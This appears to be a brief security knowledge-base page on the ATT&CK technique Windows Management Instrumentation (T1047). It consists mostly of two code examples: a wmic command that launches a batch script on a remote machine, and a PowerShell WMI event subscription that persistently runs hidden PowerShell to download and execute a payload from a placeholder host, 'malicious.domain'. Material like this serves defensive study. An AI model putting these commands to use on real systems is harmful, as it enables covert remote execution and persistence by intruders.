Windows Management Instrumentation
Windows Management Instrumentation [T1047]
Information
Introduction
Deep Dive Into Technique
wmic /node:<target_machine> process call create "cmd.exe /c malicious_script.bat"
$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{Name='MaliciousFilter'; EventNamespace='root/cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"} $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name='MaliciousConsumer'; CommandLineTemplate='powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://malicious.domain/payload.ps1'')"' } Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}
